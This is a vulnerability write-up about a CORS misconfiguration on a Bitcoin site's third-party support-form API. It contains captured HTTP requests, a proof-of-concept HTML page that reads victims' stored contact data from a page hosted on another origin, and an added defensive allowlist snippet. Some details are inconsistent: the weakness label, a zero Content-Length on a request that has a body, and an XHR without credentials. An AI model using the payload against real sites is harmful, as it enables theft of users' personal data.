Exploiting Misconfigured CORS on popular BTC Site
Severity: Medium
Complexity: Easy
Weakness: Allowing ACAH
On one of the popular BTC sites, I was facing some issue with my account, so I used their support form to inform them.
Things I provided via the form:
- Email
- Phone number
- Name
- Message
Clicked on Submit and noticed that the form was being sent to a third-party site,
https://api.thirdparty.com/api/contact/widget/281d02/, as POST data.
POST /api/contact/widget/281d02/ HTTP/1.1
Host: api.thirdparty.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cookie: REDACTED
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
{"firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9876543210","accountId":"38517","message":"xxx","Tags":[]}
- After sending the form, I changed the request method to GET,
- and added Origin: evil.com to the request headers
GET /api/contact/widget/281d02/ HTTP/1.1
Origin: evil.com
- Response:
Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true
{"contactUid":"025381","firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9123091647","additionalDetails":{},"accountId":38517,"location":null,"Tags":[]}
- Surprised to see Access-Control-Allow-Credentials: true together with the reflected Origin in the response.
<html>
<body onload='load()'><p id="demo"></p>Name: <h3 id="name"></h3>
Email : <h3 id="email"></h3>
Phone : <h3 id="phone"></h3>
ACCID :<h3 id="AccountID"></h3>
<h3 id="que"></h3><script>
// Request the contact record from the third-party API and render fields from it.
function load(){
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function(){
    if(this.readyState == 4 && this.status == 200){
      //document.getElementById('demo').innerHTML = JSON.stringify(this.responseText);
      var parsed = JSON.parse(this.responseText);
      // Collect the response values in key order and read them by position.
      var arr = [];
      for(var x in parsed){
        arr.push(parsed[x]);
      }
      console.log(arr);
      document.getElementById('email').innerHTML = arr[6];
      document.getElementById('name').innerHTML = arr[3];
      document.getElementById('phone').innerHTML = arr[7];
      document.getElementById('AccountID').innerHTML = arr[9];
    }
  };
  xhr.open("GET","https://api.thirdparty.com/api/contact/widget/281d02",true);
  xhr.send();
}</script></body>
</html>
- As soon as the victim (any user who has used their support form at any time, on any previous date) visits the malicious page, their previously submitted form data gets extracted.
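As an added example that is not code from the original write-up or from the sites it describes, the snippet below models the API-side header decision: the reflecting policy that produced the response above, beside an allowlist policy that a defender would put in its place, plus a simplified model of the browser's rule for credentialed cross-origin reads. The allowlisted origins and the attacker origin are constructed placeholders.

```javascript
// Added example (not from the original write-up). Models the CORS header decision
// on the API side and the browser's credentialed-read rule. All origins below are
// constructed placeholders.

// Constructed allowlist: only the first-party pages that legitimately embed the widget.
const ALLOWED_ORIGINS = new Set([
  "https://www.example-btc-site.test",
  "https://app.example-btc-site.test",
]);

// Weak policy seen in the write-up: echo whatever Origin arrives and allow credentials.
function reflectingCorsHeaders(requestOrigin) {
  if (!requestOrigin) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened policy: exact-match the parsed origin against the allowlist and emit
// no CORS headers otherwise, so the browser refuses the cross-origin read.
function allowlistCorsHeaders(requestOrigin, allowlist = ALLOWED_ORIGINS) {
  if (!requestOrigin) return {};
  let parsed;
  try {
    parsed = new URL(requestOrigin); // rejects bare hosts such as "evil.com" and the literal "null"
  } catch (e) {
    return {};
  }
  // Compare the normalized scheme://host[:port], never a substring or suffix match.
  const origin = parsed.origin;
  if (parsed.protocol !== "https:" || !allowlist.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    // Keep shared caches from serving one origin's ACAO to a different origin.
    "Vary": "Origin",
  };
}

// Simplified model of the browser check for a request sent with credentials:
// ACAO must equal the page origin exactly (the wildcard is rejected) and
// Allow-Credentials must be "true"; otherwise the response body is not readable.
function browserPermitsCredentialedRead(responseHeaders, pageOrigin) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  const acac = responseHeaders["Access-Control-Allow-Credentials"];
  return acao !== "*" && acao === pageOrigin && acac === "true";
}

// Run one page origin through both policies and report what the browser would allow.
function comparePolicies(pageOrigin) {
  return {
    reflecting: browserPermitsCredentialedRead(reflectingCorsHeaders(pageOrigin), pageOrigin),
    allowlist: browserPermitsCredentialedRead(allowlistCorsHeaders(pageOrigin), pageOrigin),
  };
}

console.log(comparePolicies("https://attacker.test"));             // { reflecting: true, allowlist: false }
console.log(comparePolicies("https://www.example-btc-site.test")); // { reflecting: true, allowlist: true }
```

The allowlist version answers with no CORS headers at all for unknown, malformed or `null` origins rather than a fixed "safe" origin, which avoids leaking the allowlist and keeps the browser's default same-origin rule in force; `Vary: Origin` matters once responses pass through a shared cache.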